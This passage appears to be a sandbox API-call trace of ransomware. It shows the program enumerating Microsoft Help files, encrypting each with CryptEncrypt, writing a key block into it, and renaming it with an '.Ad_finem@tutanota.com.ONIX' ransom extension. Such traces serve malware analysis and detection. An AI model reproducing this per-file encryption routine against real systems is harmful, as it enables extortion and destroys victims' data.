[0122.327] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x44faf8 [0122.327] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x442938 [0122.327] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.327] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.327] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.327] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.328] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.328] CloseHandle (hObject=0x4d0) returned 1 [0122.329] GetProcessHeap () returned 0x410000 [0122.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.329] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.dev.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.331] GetProcessHeap () returned 0x410000 [0122.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.331] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.SHAPESHEET.14.1033.hxn", cAlternateFileName="MSVISI~4.HXN")) returned 1 [0122.331] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.331] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.331] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x188, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.331] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.331] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.331] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.331] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.331] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.332] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned 66 [0122.332] GetProcessHeap () returned 0x410000 [0122.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf4) returned 0x44fb90 [0122.332] lstrcpyW (in: lpString1=0x44fb90, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" [0122.332] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.332] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=392) returned 1 [0122.332] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x188 [0122.332] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.332] GetProcessHeap () returned 0x410000 [0122.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.332] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.332] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.336] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.337] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x188) returned 0x442938 [0122.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x188) returned 0x46a0f0 [0122.338] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.338] ReadFile (in: hFile=0x4d0, lpBuffer=0x442938, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x188, lpOverlapped=0x0) returned 1 [0122.339] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-392, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.339] WriteFile (in: hFile=0x4d0, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x188, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x188, lpOverlapped=0x0) returned 1 [0122.340] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x188, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.340] CloseHandle (hObject=0x4d0) returned 1 [0122.341] GetProcessHeap () returned 0x410000 [0122.341] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.341] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.343] GetProcessHeap () returned 0x410000 [0122.343] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44fb90 | out: hHeap=0x410000) returned 1 [0122.343] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_PRM.14.1033.hxn", cAlternateFileName="MSE1C9~1.HXN")) returned 1 [0122.343] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.344] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.344] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15e, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.344] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.344] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.344] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.344] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.344] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.345] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned 59 [0122.345] GetProcessHeap () returned 0x410000 [0122.345] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0122.345] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" [0122.345] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.345] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=350) returned 1 [0122.345] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15e [0122.345] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.345] GetProcessHeap () returned 0x410000 [0122.345] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.345] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.345] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.351] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.352] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.353] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x44faf8 [0122.353] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x442938 [0122.353] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.353] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.353] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.353] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.354] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.354] CloseHandle (hObject=0x4d0) returned 1 [0122.354] GetProcessHeap () returned 0x410000 [0122.354] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.354] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_prm.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.357] GetProcessHeap () returned 0x410000 [0122.357] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.357] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_STD.14.1033.hxn", cAlternateFileName="MSVISI~2.HXN")) returned 1 [0122.357] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.357] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.358] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15e, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.358] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.358] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.358] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.358] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.358] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.358] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned 59 [0122.358] GetProcessHeap () returned 0x410000 [0122.358] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe6) returned 0x467908 [0122.358] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" [0122.358] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.358] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=350) returned 1 [0122.358] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15e [0122.358] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.358] GetProcessHeap () returned 0x410000 [0122.358] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.358] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.358] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.362] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.363] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x44faf8 [0122.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15e) returned 0x442938 [0122.364] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.364] ReadFile (in: hFile=0x4d0, lpBuffer=0x44faf8, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x44faf8*, lpNumberOfBytesRead=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.364] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.364] WriteFile (in: hFile=0x4d0, lpBuffer=0x442938*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesWritten=0x367f44c*=0x15e, lpOverlapped=0x0) returned 1 [0122.365] UnlockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.365] CloseHandle (hObject=0x4d0) returned 1 [0122.366] GetProcessHeap () returned 0x410000 [0122.366] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.366] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\all users\\microsoft help\\ms.visio_std.14.1033.hxn.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.368] GetProcessHeap () returned 0x410000 [0122.368] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0122.368] FindNextFileW (in: hFindFile=0x48f070, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.14.1033.hxn", cAlternateFileName="MSWINP~1.HXN")) returned 1 [0122.368] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4d0 [0122.368] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.368] LockFile (hFile=0x4d0, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x152, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.368] SetFilePointerEx (in: hFile=0x4d0, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.369] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.369] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.369] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.369] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0122.369] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 57 [0122.369] GetProcessHeap () returned 0x410000 [0122.369] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe2) returned 0x467908 [0122.369] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" [0122.369] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.369] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=338) returned 1 [0122.369] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x152 [0122.369] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.369] GetProcessHeap () returned 0x410000 [0122.369] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.369] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.369] WriteFile (in: hFile=0x4d0, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.373] WriteFile (in: hFile=0x4d0, lpBuffer=0x4b27a0*, 